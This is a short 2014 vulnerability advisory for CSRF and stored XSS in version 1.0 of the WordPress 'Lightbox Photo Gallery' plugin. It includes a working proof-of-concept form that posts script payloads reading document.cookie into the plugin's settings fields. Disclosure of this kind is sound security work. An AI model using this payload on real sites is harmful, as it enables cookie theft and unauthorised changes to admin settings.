Title: WordPress 'Lightbox Photo Gallery' plugin - CSRF/XSS
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/lightbox-photo-gallery/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description: 
----------------------------------------------------------------
Lighbox Photo Gallery will help you quickly and easily create an appealing photo gallery that opens in a lightbox. Use the settings page to select the images you want in your gallery and add the shortcode [ll-gallery] to the page or post where you want the gallery to show

## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and then submit the following form. 
  <form method="POST" action="http://[DOMAIN]/wp-admin/admin-ajax.php"> 
     <input type="text" name="action" value="ll_save_settings"><br />
    <input type="text" name="ll__opt[image2_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png"><script>alert(document.cookie);</script>"><br />
    <input type="text" name="ll__opt[image3_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png"><script>alert(document.cookie);</script>"><br />
    <input type="text" name="ll__opt[background_color]" value="#ffffff"><br />  
    <input type="text" name="ll__opt[disable]" value="1"><br />  
    <input type="submit">
  </form>


## Solution
----------------------------------------------------------------
No fix available. 

WordPress has been notified and the plugin has been closed until it is updated.